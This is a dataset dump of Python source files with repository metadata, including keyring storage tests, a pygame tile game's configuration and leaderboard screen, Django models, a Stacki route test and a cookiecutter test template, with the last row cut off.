hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a7f04927312c54fd0baf48c57fcf9282e128c3f1 | 7,107 | py | Python | tests/test_file.py | kellerjustin/keyrings.cryptfile | 85b7735b937ecd5bbf0720092586b74e737d86a6 | [
"MIT"
] | null | null | null | tests/test_file.py | kellerjustin/keyrings.cryptfile | 85b7735b937ecd5bbf0720092586b74e737d86a6 | [
"MIT"
] | null | null | null | tests/test_file.py | kellerjustin/keyrings.cryptfile | 85b7735b937ecd5bbf0720092586b74e737d86a6 | [
"MIT"
] | null | null | null | import os
import tempfile
import sys
import errno
import getpass
import configparser
import pytest
from unittest import mock
from keyring.testing.backend import BackendBasicTests
from keyring.testing.util import random_string
from keyrings.cryptfile import file
from keyrings.cryptfile.file_base import encodebytes
from keyrings.cryptfile.escape import escape as escape_for_ini
from keyring.errors import PasswordDeleteError
| 34.333333 | 76 | 0.658084 | import os
import tempfile
import sys
import errno
import getpass
import configparser
import pytest
from unittest import mock
from keyring.testing.backend import BackendBasicTests
from keyring.testing.util import random_string
from keyrings.cryptfile import file
from keyrings.cryptfile.file_base import encodebytes
from keyrings.cryptfile.escape import escape as escape_for_ini
from keyring.errors import PasswordDeleteError
class FileKeyringTests(BackendBasicTests):
@pytest.fixture(autouse=True)
def _init_properties_for_file(self):
self.keyring.file_path = tempfile.mktemp()
yield
@pytest.fixture(autouse=True)
def _cleanup_for_file(self):
yield
try:
os.remove(self.keyring.file_path) # remove file
except OSError: # is a directory
e = sys.exc_info()[1]
if e.errno != errno.ENOENT: # No such file or directory
raise
def get_config(self):
# setting a password triggers keyring file creation
config = configparser.RawConfigParser()
config.read(self.keyring.file_path)
return config
def save_config(self, config):
with open(self.keyring.file_path, 'w') as config_file:
config.write(config_file)
def test_encrypt_decrypt(self):
password = random_string(20)
# keyring.encrypt expects bytes
password = password.encode('utf-8')
encrypted = self.keyring.encrypt(password)
assert password == self.keyring.decrypt(encrypted)
def test_encrypt_decrypt_without_assoc(self):
# generate keyring
self.set_password('system', 'user', 'password')
config = self.get_config()
# generate and save password without assoc data
encrypted = self.keyring.encrypt('password'.encode('utf-8'))
password_base64 = '\n' + encodebytes(encrypted).decode()
config.set('system', 'user', password_base64)
self.save_config(config)
assert self.keyring.get_password('system', 'user') == 'password'
def test_delete_password(self):
self.set_password('system', 'user', 'password')
with pytest.raises(PasswordDeleteError):
self.keyring.delete_password('system', 'xxxx')
with pytest.raises(PasswordDeleteError):
self.keyring.delete_password('xxxxxx', 'xxxx')
def test_file(self):
if not hasattr(self.keyring, '_check_file'):
return
# keyring file doesn't exist yet
assert self.keyring._check_file() is False
# generate keyring
self.set_password('system', 'user', 'password')
# valid keyring file exist now
assert self.keyring._check_file() is True
# lock keyring
self.keyring._lock()
# fetch password from keyring
assert self.keyring.get_password('system', 'user') == 'password'
# test missing password reference
config = self.get_config()
krsetting = escape_for_ini('keyring-setting')
pwref = escape_for_ini('password reference')
# pwrefval = config.get(krsetting, pwref)
config.remove_option(krsetting, pwref)
self.save_config(config)
assert self.keyring._check_file() is False
def test_scheme(self):
# scheme exists
assert self.keyring.scheme is not None
if not hasattr(self.keyring, '_check_file'):
return
# keyring file doesn't exist yet
assert self.keyring._check_file() is False
# generate keyring
self.set_password('system', 'user', 'password')
config = self.get_config()
krsetting = escape_for_ini('keyring-setting')
scheme = escape_for_ini('scheme')
defscheme = '[PBKDF2] AES256.CFB'
# default scheme match
assert config.get(krsetting, scheme) == defscheme
# invalid AES mode
config.set(krsetting, scheme, defscheme.replace('CFB', 'XXX'))
with pytest.raises(ValueError):
self.keyring._check_scheme(config)
# compatibility with former scheme format
config.set(krsetting, scheme, 'PyCrypto ' + defscheme)
assert self.keyring._check_scheme(config) is None
# test with invalid KDF
config.set(krsetting, scheme, defscheme.replace('PBKDF2', 'scrypt'))
with pytest.raises(ValueError):
self.keyring._check_scheme(config)
# a missing scheme is valid
config.remove_option(krsetting, scheme)
self.save_config(config)
assert self.keyring._check_file() is True
with pytest.raises(AttributeError):
self.keyring._check_scheme(config)
def test_version(self):
# version exists
assert self.keyring.version is not None
if not hasattr(self.keyring, '_check_version'):
return
# generate keyring
self.set_password('system', 'user', 'password')
config = self.get_config()
# default version valid
assert self.keyring._check_version(config) is True
krsetting = escape_for_ini('keyring-setting')
version = escape_for_ini('version')
# invalid, if version is missing
config.remove_option(krsetting, version)
self.save_config(config)
assert self.keyring._check_version(config) is False
class TestEncryptedFileKeyring(FileKeyringTests):
@pytest.fixture(autouse=True)
def crypt_fixture(self, monkeypatch):
pytest.importorskip('Crypto')
fake_getpass = mock.Mock(return_value='abcdef')
monkeypatch.setattr(getpass, 'getpass', fake_getpass)
def init_keyring(self):
return file.EncryptedKeyring()
def test_wrong_password(self):
self.set_password('system', 'user', 'password')
getpass.getpass.return_value = 'wrong'
with pytest.raises(ValueError):
self.keyring._unlock()
@pytest.mark.skipif(
sys.platform == 'win32',
reason="Group/World permissions aren't meaningful on Windows",
)
def test_keyring_not_created_world_writable(self):
"""
Ensure that when keyring creates the file that it's not overly-
permissive.
"""
self.set_password('system', 'user', 'password')
assert os.path.exists(self.keyring.file_path)
group_other_perms = os.stat(self.keyring.file_path).st_mode & 0o077
assert group_other_perms == 0
class TestUncryptedFileKeyring(FileKeyringTests):
def init_keyring(self):
return file.PlaintextKeyring()
@pytest.mark.skipif(
sys.platform == 'win32',
reason="Group/World permissions aren't meaningful on Windows",
)
def test_keyring_not_created_world_writable(self):
"""
Ensure that when keyring creates the file that it's not overly-
permissive.
"""
self.set_password('system', 'user', 'password')
assert os.path.exists(self.keyring.file_path)
group_other_perms = os.stat(self.keyring.file_path).st_mode & 0o077
assert group_other_perms == 0
| 4,988 | 1,618 | 69 |
a7458a46e77f76c9090f89ed0eaea5db0320edcc | 7,947 | py | Python | src/flags.py | whoji/castle2048 | 5532b92809927b04d5ab5f3f9f3f8652ed7901e5 | [
"MIT"
] | null | null | null | src/flags.py | whoji/castle2048 | 5532b92809927b04d5ab5f3f9f3f8652ed7901e5 | [
"MIT"
] | null | null | null | src/flags.py | whoji/castle2048 | 5532b92809927b04d5ab5f3f9f3f8652ed7901e5 | [
"MIT"
] | null | null | null | import math
import pygame
from pygame.locals import *
class Flags(object):
"""docstring for Flags"""
# def __get_sound(self):
# self.sounds = {
# 'move' : pygame.mixer.Sound(self.proj_path + 'asset/sound/Coin_1.wav'),
# 'merge' : pygame.mixer.Sound(self.proj_path + 'asset/sound/Coin_2.wav'),
# 'castle' : pygame.mixer.Sound(self.proj_path + 'asset/sound/Coin_3.wav')
# }
F = Flags()
| 42.497326 | 96 | 0.600101 | import math
import pygame
from pygame.locals import *
class Flags(object):
"""docstring for Flags"""
def __init__(self):
self.game_name = 'Castle 2048'
self.game_ver = '0.13.apha.190203'
self.proj_path = './'
self.save_path = './save/'
self.debug_mod = False
self.game_fps = 60
# colors
self.grey1 = (28,32,38)
self.grey2 = (14,22,14)
self.black = (0,0,0)
self.white = (255,255,255)
self.red = (250,50,50)
self.blue = (50,50,250)
self.blue2 = (2,39,99) # dark blue
self.green = (50, 200, 100)
self.yellow = (200,200,50)
self.orange = (255, 153, 58)
self.block_text_fg = self.white
self.block_text_bg = None #self.black
# size and pos conf (general and menu)
self.window_w = 800
self.window_h = 600
self.tile_size = 100
self.map_rows = 5
self.map_cols = 5
self.status_bar_size = 60
self.board_offset_x, self.board_offset_y = self.__calculate_board_offset()
self.text_offset_x = 10
self.text_offset_y = 10
self.text_offset = (10,10)
self.menu_rect = (self.board_offset_x+50, self.board_offset_y+50,
self.map_cols*self.tile_size-100, self.map_rows*self.tile_size-100)
self.center_x = round(self.window_w / 2)
self.center_y = round((self.window_h) / 2)
self.blink_title = True
self.blink_tile_fps = 20 # every 10 frames will change color
# size and pos conf (board)
self.board_color = self.grey1
self.board_frame_color = self.orange
self.board_frame_px = 2
self.board_rect = (self.board_offset_x, self.board_offset_y,
self.map_cols*self.tile_size, self.map_rows*self.tile_size)
self.board_outer_rect = (self.board_offset_x-self.board_frame_px,
self.board_offset_y-self.board_frame_px,
self.map_cols*self.tile_size+2*self.board_frame_px,
self.map_rows*self.tile_size+2*self.board_frame_px)
self.init_board_blocks = 2
self.block_font_center = True
self.block_font_size = int(self.tile_size / 2)
self.block_font_sizes = [int(self.tile_size / 2), # for 1 digit
int(self.tile_size / 3), # for 2 digit
int(self.tile_size / 4), # for 3 digit
int(self.tile_size / 5) # for 4 digit
]
self.block_font_size_perc = (1, 1, 0.9, 0.8, 0.5, 0.5, 0.5)
# status bar
self.display_castle = True
self.castle_icon_px = 30
self.castle_icon_gap = 1
self.big_castle_icon = True
if self.big_castle_icon:
self.castle_icon_px = 50
self.castle_icon_gap = 3
self.castle_list = [1,4,16, 64,256,1024,4096,16384]
# star
self.if_star = True
self.star_pos = (2,2)
self.star_tile_color = self.red
self.star_tile_frame_color = self.red
# game flow control
self.win_condition_block = self.__calculate_win_block()
self.milestone_mode = True
self.milestone = [2**i for i in range(16)]
# block moving effect
self.if_movable = True
self.move_frame = 10 # frames to finish the move
# load texture
self.__get_textures()
self.__resize_texture()
# load sound effects
#self.__get_sound()
# run self check
#self.__self_check():
def __self_check():
raise NotImplementedError
#raise Exception("Bad set up logic")
def __calculate_win_block(self):
ret = 2 ** (int(math.sqrt(self.map_rows * self.map_cols))*3 - 1)
ret = 2048
if self.debug_mod:
if self.map_rows == 3:
ret = 32
if self.map_rows == 4:
ret = 256
ret = 1024
return ret
def __calculate_board_offset(self):
offset_x = round(self.window_w / 2 - self.map_cols * self.tile_size / 2)
offset_y = round((self.window_h - self.status_bar_size) / 2 -
self.map_rows * self.tile_size / 2)
return offset_x, offset_y
def __get_textures(self):
self.textures = {
-1 : pygame.image.load(self.proj_path + 'asset/stone/stone_0.png'),
1 : pygame.image.load(self.proj_path + 'asset/stone/stone_a.png'),
2 : pygame.image.load(self.proj_path + 'asset/stone/stone_b.png'),
4 : pygame.image.load(self.proj_path + 'asset/stone/stone_1.png'),
8 : pygame.image.load(self.proj_path + 'asset/stone/stone_2.png'),
16 : pygame.image.load(self.proj_path + 'asset/stone/stone_3.png'),
32 : pygame.image.load(self.proj_path + 'asset/stone/stone_4.png'),
64 : pygame.image.load(self.proj_path + 'asset/stone/stone_5.png'),
128 : pygame.image.load(self.proj_path + 'asset/stone/stone_6.png'),
256 : pygame.image.load(self.proj_path + 'asset/stone/stone_7.png'),
512 : pygame.image.load(self.proj_path + 'asset/stone/stone_8.png'),
1024 : pygame.image.load(self.proj_path + 'asset/stone/stone_9.png'),
2048 : pygame.image.load(self.proj_path + 'asset/stone/stone_10.png'),
4096 : pygame.image.load(self.proj_path + 'asset/stone/stone_11.png'),
8192 : pygame.image.load(self.proj_path + 'asset/stone/stone_12.png'),
16384 : pygame.image.load(self.proj_path + 'asset/stone/stone_13.png'),
32768 : pygame.image.load(self.proj_path + 'asset/stone/stone_14.png')
}
self.castle_textures = {
1 : pygame.image.load(self.proj_path + 'asset/castle/castle_0.png'),
2 : pygame.image.load(self.proj_path + 'asset/castle/castle_0b.png'),
4 : pygame.image.load(self.proj_path + 'asset/castle/castle_1.png'),
8 : pygame.image.load(self.proj_path + 'asset/castle/castle_1b.png'),
16 : pygame.image.load(self.proj_path + 'asset/castle/castle_2.png'),
32 : pygame.image.load(self.proj_path + 'asset/castle/castle_2b.png'),
64 : pygame.image.load(self.proj_path + 'asset/castle/castle_3.png'),
128 : pygame.image.load(self.proj_path + 'asset/castle/castle_3b.png'),
256 : pygame.image.load(self.proj_path + 'asset/castle/castle_x0.png'),
512 : pygame.image.load(self.proj_path + 'asset/castle/castle_x0.png'),
1024 : pygame.image.load(self.proj_path + 'asset/castle/castle_x1.png'),
2048 : pygame.image.load(self.proj_path + 'asset/castle/castle_x2.png'),
4096 : pygame.image.load(self.proj_path + 'asset/castle/castle_x3.png'),
8192 : pygame.image.load(self.proj_path + 'asset/castle/castle_x4.png'),
16384 : pygame.image.load(self.proj_path + 'asset/castle/castle_x5.png'),
32768 : pygame.image.load(self.proj_path + 'asset/castle/castle_x6.png')
}
def __resize_texture(self):
for k,v in self.textures.items():
self.textures[k] = pygame.transform.scale(
self.textures[k], (self.tile_size-2*self.board_frame_px,
self.tile_size-2*self.board_frame_px))
for k,v in self.castle_textures.items():
self.castle_textures[k] = pygame.transform.scale(
self.castle_textures[k], (self.tile_size-2*self.board_frame_px,
self.tile_size-2*self.board_frame_px))
# def __get_sound(self):
# self.sounds = {
# 'move' : pygame.mixer.Sound(self.proj_path + 'asset/sound/Coin_1.wav'),
# 'merge' : pygame.mixer.Sound(self.proj_path + 'asset/sound/Coin_2.wav'),
# 'castle' : pygame.mixer.Sound(self.proj_path + 'asset/sound/Coin_3.wav')
# }
F = Flags()
| 7,331 | 0 | 162 |
a9528b7459fa88a7e299377df8afca39ca1c719d | 2,836 | py | Python | main/models.py | lixianjing/HFMS | 3b97ddc6062140fd22232a2e9bdf205e91a4405a | [
"Apache-2.0"
] | 1 | 2019-11-22T03:24:25.000Z | 2019-11-22T03:24:25.000Z | main/models.py | lixianjing/HFMS | 3b97ddc6062140fd22232a2e9bdf205e91a4405a | [
"Apache-2.0"
] | null | null | null | main/models.py | lixianjing/HFMS | 3b97ddc6062140fd22232a2e9bdf205e91a4405a | [
"Apache-2.0"
] | null | null | null | # This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey has `on_delete` set to the desired behavior.
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from django.db import models
| 36.358974 | 112 | 0.711566 | # This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Make sure each ForeignKey has `on_delete` set to the desired behavior.
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
from django.db import models
class Account(models.Model):
field_id = models.AutoField(db_column='_id', primary_key=True) # Field renamed because it started with '_'.
id = models.PositiveIntegerField(unique=True)
uid = models.PositiveIntegerField()
type = models.PositiveIntegerField(blank=True, null=True)
name = models.CharField(max_length=200)
balance = models.FloatField(blank=True, null=True)
remark = models.TextField(blank=True, null=True)
create_time = models.TextField()
modify_time = models.TextField()
class Meta:
managed = False
db_table = 'account'
class Category(models.Model):
field_id = models.AutoField(db_column='_id', primary_key=True) # Field renamed because it started with '_'.
id = models.PositiveIntegerField(unique=True)
name = models.CharField(max_length=200)
type = models.PositiveIntegerField()
class Meta:
managed = False
db_table = 'category'
class CategorySub(models.Model):
field_id = models.AutoField(db_column='_id', primary_key=True) # Field renamed because it started with '_'.
id = models.PositiveIntegerField(unique=True)
pid = models.PositiveIntegerField()
name = models.CharField(max_length=200)
class Meta:
managed = False
db_table = 'category_sub'
class Record(models.Model):
field_id = models.AutoField(db_column='_id', primary_key=True) # Field renamed because it started with '_'.
id = models.PositiveIntegerField(unique=True)
cate_id = models.PositiveIntegerField()
uid = models.PositiveIntegerField()
account_id = models.PositiveIntegerField()
type = models.PositiveIntegerField(blank=True, null=True)
type_id = models.PositiveIntegerField(blank=True, null=True)
amount = models.FloatField(blank=True, null=True)
remark = models.TextField(blank=True, null=True)
occur_time = models.TextField()
status = models.PositiveIntegerField(blank=True, null=True)
class Meta:
managed = False
db_table = 'record'
class Test(models.Model):
field_id = models.AutoField(db_column='_id', primary_key=True) # Field renamed because it started with '_'.
id = models.PositiveIntegerField(unique=True)
name = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'test'
| 0 | 2,216 | 115 |
0fb25e247aa94c339a444ab4b66d0fa2df220639 | 2,128 | py | Python | test-framework/test-suites/integration/tests/report/test_report_host_route.py | knutsonchris/stacki | 33087dd5fa311984a66ccecfeee6f9c2c25f665d | [
"BSD-3-Clause"
] | 123 | 2015-05-12T23:36:45.000Z | 2017-07-05T23:26:57.000Z | test-framework/test-suites/integration/tests/report/test_report_host_route.py | knutsonchris/stacki | 33087dd5fa311984a66ccecfeee6f9c2c25f665d | [
"BSD-3-Clause"
] | 177 | 2015-06-05T19:17:47.000Z | 2017-07-07T17:57:24.000Z | test-framework/test-suites/integration/tests/report/test_report_host_route.py | knutsonchris/stacki | 33087dd5fa311984a66ccecfeee6f9c2c25f665d | [
"BSD-3-Clause"
] | 32 | 2015-06-07T02:25:03.000Z | 2017-06-23T07:35:35.000Z | import json
| 28 | 100 | 0.699718 | import json
class TestReportHostRoute:
def test_scope_resolving(self, host, add_host_with_interface, add_environment, host_os, test_file):
# Add our host to the test environment
result = host.run('stack set host environment backend-0-0 environment=test')
assert result.rc == 0
# Set the backend's interface to the private network
result = host.run(
'stack set host interface network backend-0-0 '
'interface=eth0 network=private'
)
assert result.rc == 0
# Add a bunch of routes to get applied to the host, in different scopes
result = host.run(
'stack add route address=192.168.0.3 gateway=private'
)
assert result.rc == 0
result = host.run(
'stack add appliance route backend address=192.168.0.4 '
'gateway=192.168.0.1 interface=eth0'
)
assert result.rc == 0
result = host.run(
f'stack add os route {host_os} address=192.168.0.5 gateway=192.168.0.1'
)
assert result.rc == 0
result = host.run(
'stack add environment route test address=192.168.0.6 gateway=private'
)
assert result.rc == 0
result = host.run(
'stack add host route backend-0-0 address=192.168.0.7 gateway=private'
)
assert result.rc == 0
# Add a bunch of rules that will be overridden to just one rule
result = host.run(
'stack add route address=192.168.0.8 gateway=private'
)
assert result.rc == 0
result = host.run(
'stack add appliance route backend address=192.168.0.8 gateway=private'
)
assert result.rc == 0
result = host.run(
f'stack add os route {host_os} address=192.168.0.8 gateway=private'
)
assert result.rc == 0
result = host.run(
'stack add environment route test address=192.168.0.8 gateway=private'
)
assert result.rc == 0
result = host.run(
'stack add host route backend-0-0 address=192.168.0.8 gateway=private'
)
assert result.rc == 0
# Now report the host rules and see if they match what we expect
result = host.run('stack report host route backend-0-0')
assert result.rc == 0
with open(test_file(f'report/host_route_scope_resolving_{host_os}.txt')) as output:
assert result.stdout == output.read()
| 2,064 | 5 | 46 |
d3ab97481d24a0956b7f73d553025b68e0295cf2 | 4,662 | py | Python | leaderboard_view.py | MCOxford/tile_miner | eefa0c8a31cf44e9b25ee3e779bc21b7ee79212e | [
"MIT"
] | null | null | null | leaderboard_view.py | MCOxford/tile_miner | eefa0c8a31cf44e9b25ee3e779bc21b7ee79212e | [
"MIT"
] | null | null | null | leaderboard_view.py | MCOxford/tile_miner | eefa0c8a31cf44e9b25ee3e779bc21b7ee79212e | [
"MIT"
] | null | null | null | import arcade
import arcade.gui
import menu_view
from data_handler import DataHandler
from arcade.gui import UIManager
from constants import *
import os
dirname = os.path.dirname(__file__)
button_normal = arcade.load_texture(os.path.join(dirname, 'images/red_button_normal.png'))
hovered_texture = arcade.load_texture(os.path.join(dirname, 'images/red_button_hover.png'))
pressed_texture = arcade.load_texture(os.path.join(dirname, 'images/red_button_press.png'))
class BackButton(arcade.gui.UIImageButton):
"""
When clicked, go back to the menu view.
"""
go_back = False
class LeaderboardView(arcade.View):
"""
This view displays player name and data obtained from the .xml file (via DataHandler).
"""
def __init__(self):
"""
LeaderboardView construct.
"""
super().__init__()
arcade.set_background_color(arcade.color.LIGHT_TAUPE)
self.ui_manager = UIManager()
# GUI elements which will get constructed in setup()
self.back_button = None
def setup(self):
"""
Sets up leaderboard screen with GUI elements.
:return:
"""
self.ui_manager.purge_ui_elements()
# back button - press to play the game (creates a new view)
self.back_button = BackButton(center_x=WIDTH / 2, center_y=HEIGHT * 1.5 / 10, normal_texture=button_normal,
hover_texture=hovered_texture, press_texture=pressed_texture, text='Back')
self.ui_manager.add_ui_element(self.back_button)
def on_draw(self):
"""
Render the screen.
"""
arcade.start_render()
arcade.draw_text("LEADERBOARD", WIDTH / 2, HEIGHT * 3/4,
arcade.color.BLACK, font_size=75, anchor_x="center")
arcade.draw_text("Name", WIDTH / 6, HEIGHT * 3 / 4 - 50,
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text("Date", WIDTH * 2/6, HEIGHT * 3 / 4 - 50,
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text("Dimensions", WIDTH * 3.1/6, HEIGHT * 3 / 4 - 50,
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text("Time", WIDTH * 4.1/6, HEIGHT * 3 / 4 - 50,
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text("Score", WIDTH * 5/6, HEIGHT * 3 / 4 - 50,
arcade.color.BLACK, font_size=20, anchor_x="center")
# Display player data
leaderboard_data = DataHandler.get_leaderboard_data()
for i in range(len(leaderboard_data)):
rank = str(i+1)
# If name is too big, shorten it using '...' (e.g. Franklin -> Frankl...)
name = leaderboard_data[rank]['name']
name = name[:6] + '...' if len(name) > 6 else name
# Display the data
arcade.draw_text(name, WIDTH / 6, HEIGHT * 3 / 4 - 50*(i+2),
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text(leaderboard_data[rank]['date'], WIDTH * 2 / 6, HEIGHT * 3 / 4 - 50*(i+2),
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text(leaderboard_data[rank]['dimensions'], WIDTH * 3.1 / 6, HEIGHT * 3 / 4 - 50*(i+2),
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text(leaderboard_data[rank]['time'], WIDTH * 4.1 / 6, HEIGHT * 3 / 4 - 50*(i+2),
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text(leaderboard_data[rank]['score'], WIDTH * 5 / 6, HEIGHT * 3 / 4 - 50*(i+2),
arcade.color.BLACK, font_size=20, anchor_x="center")
def on_show_view(self):
"""
Show this view.
"""
self.setup()
def on_hide_view(self):
"""
What to do when hiding this view.
:return:
"""
self.ui_manager.unregister_handlers()
def update(self, delta_time: float):
"""
Called every frame.
:param delta_time: delta time for each frame.
:return:
"""
if self.back_button.go_back:
next_view = menu_view.MainMenu()
self.window.show_view(next_view)
if __name__ == "__main__":
main()
| 34.791045 | 115 | 0.587731 | import arcade
import arcade.gui
import menu_view
from data_handler import DataHandler
from arcade.gui import UIManager
from constants import *
import os
dirname = os.path.dirname(__file__)
button_normal = arcade.load_texture(os.path.join(dirname, 'images/red_button_normal.png'))
hovered_texture = arcade.load_texture(os.path.join(dirname, 'images/red_button_hover.png'))
pressed_texture = arcade.load_texture(os.path.join(dirname, 'images/red_button_press.png'))
class BackButton(arcade.gui.UIImageButton):
"""
When clicked, go back to the menu view.
"""
go_back = False
def on_click(self):
self.go_back = True
class LeaderboardView(arcade.View):
"""
This view displays player name and data obtained from the .xml file (via DataHandler).
"""
def __init__(self):
"""
LeaderboardView construct.
"""
super().__init__()
arcade.set_background_color(arcade.color.LIGHT_TAUPE)
self.ui_manager = UIManager()
# GUI elements which will get constructed in setup()
self.back_button = None
def setup(self):
"""
Sets up leaderboard screen with GUI elements.
:return:
"""
self.ui_manager.purge_ui_elements()
# back button - press to play the game (creates a new view)
self.back_button = BackButton(center_x=WIDTH / 2, center_y=HEIGHT * 1.5 / 10, normal_texture=button_normal,
hover_texture=hovered_texture, press_texture=pressed_texture, text='Back')
self.ui_manager.add_ui_element(self.back_button)
def on_draw(self):
"""
Render the screen.
"""
arcade.start_render()
arcade.draw_text("LEADERBOARD", WIDTH / 2, HEIGHT * 3/4,
arcade.color.BLACK, font_size=75, anchor_x="center")
arcade.draw_text("Name", WIDTH / 6, HEIGHT * 3 / 4 - 50,
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text("Date", WIDTH * 2/6, HEIGHT * 3 / 4 - 50,
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text("Dimensions", WIDTH * 3.1/6, HEIGHT * 3 / 4 - 50,
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text("Time", WIDTH * 4.1/6, HEIGHT * 3 / 4 - 50,
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text("Score", WIDTH * 5/6, HEIGHT * 3 / 4 - 50,
arcade.color.BLACK, font_size=20, anchor_x="center")
# Display player data
leaderboard_data = DataHandler.get_leaderboard_data()
for i in range(len(leaderboard_data)):
rank = str(i+1)
# If name is too big, shorten it using '...' (e.g. Franklin -> Frankl...)
name = leaderboard_data[rank]['name']
name = name[:6] + '...' if len(name) > 6 else name
# Display the data
arcade.draw_text(name, WIDTH / 6, HEIGHT * 3 / 4 - 50*(i+2),
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text(leaderboard_data[rank]['date'], WIDTH * 2 / 6, HEIGHT * 3 / 4 - 50*(i+2),
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text(leaderboard_data[rank]['dimensions'], WIDTH * 3.1 / 6, HEIGHT * 3 / 4 - 50*(i+2),
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text(leaderboard_data[rank]['time'], WIDTH * 4.1 / 6, HEIGHT * 3 / 4 - 50*(i+2),
arcade.color.BLACK, font_size=20, anchor_x="center")
arcade.draw_text(leaderboard_data[rank]['score'], WIDTH * 5 / 6, HEIGHT * 3 / 4 - 50*(i+2),
arcade.color.BLACK, font_size=20, anchor_x="center")
def on_show_view(self):
"""
Show this view.
"""
self.setup()
def on_hide_view(self):
"""
What to do when hiding this view.
:return:
"""
self.ui_manager.unregister_handlers()
def update(self, delta_time: float):
"""
Called every frame.
:param delta_time: delta time for each frame.
:return:
"""
if self.back_button.go_back:
next_view = menu_view.MainMenu()
self.window.show_view(next_view)
def main():
window = arcade.Window(WIDTH, HEIGHT, "Tile Miner")
leaderboard_view = LeaderboardView()
window.show_view(leaderboard_view)
arcade.run()
if __name__ == "__main__":
main()
| 169 | 0 | 50 |
d92117457af089c8066d24f4437d773bd086c5b1 | 506 | py | Python | {{cookiecutter.package_name}}/tests/test_{{ cookiecutter.package_name }}.py | ryankanno/cookiecutter-py | 4877ce8c6a0355b537da4985210c7c0d9db11e6c | [
"MIT"
] | 2 | 2019-02-10T18:59:29.000Z | 2021-07-12T22:38:40.000Z | {{cookiecutter.package_name}}/tests/test_{{ cookiecutter.package_name }}.py | ryankanno/cookiecutter-py | 4877ce8c6a0355b537da4985210c7c0d9db11e6c | [
"MIT"
] | null | null | null | {{cookiecutter.package_name}}/tests/test_{{ cookiecutter.package_name }}.py | ryankanno/cookiecutter-py | 4877ce8c6a0355b537da4985210c7c0d9db11e6c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Tests for `{{ cookiecutter.package_name }}` package.
"""
from {{ cookiecutter.package_name }} import {{ cookiecutter.package_name }}
class Test{{ cookiecutter.project_name|replace(' ', '')}}(object):
@classmethod
@classmethod
# vim: filetype=python
| 20.24 | 77 | 0.644269 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Tests for `{{ cookiecutter.package_name }}` package.
"""
from {{ cookiecutter.package_name }} import {{ cookiecutter.package_name }}
class Test{{ cookiecutter.project_name|replace(' ', '')}}(object):
@classmethod
def setup_class(cls):
pass
def test_hello_world(self):
assert {{ cookiecutter.package_name }}.hello_world() == "Hello World"
@classmethod
def teardown_class(cls):
pass
# vim: filetype=python
| 113 | 0 | 79 |
edc190d4b974d923978c79efd3cd10032b5cb503 | 22 | py | Python | tccli/services/live/v20180801/__init__.py | ivandksun/tencentcloud-cli-intl-en | 41b84e339918961b8bc92f7498e56347d21e16d3 | [
"Apache-2.0"
] | null | null | null | tccli/services/live/v20180801/__init__.py | ivandksun/tencentcloud-cli-intl-en | 41b84e339918961b8bc92f7498e56347d21e16d3 | [
"Apache-2.0"
] | 1 | 2022-02-07T13:39:09.000Z | 2022-02-07T13:39:09.000Z | tccli/services/live/v20180801/__init__.py | ivandksun/tencentcloud-cli-intl-en | 41b84e339918961b8bc92f7498e56347d21e16d3 | [
"Apache-2.0"
] | 4 | 2020-07-20T01:51:58.000Z | 2021-08-13T08:25:22.000Z | version = "2018-08-01" | 22 | 22 | 0.681818 | version = "2018-08-01" | 0 | 0 | 0 |
c92d12f759f6f32d63b1e4e6f645d878df664f1a | 828 | py | Python | fs/tests/test_basename.py | sturmianseq/python-fs | 2567922ced9387e327e65f3244caff3b7af35684 | [
"MIT"
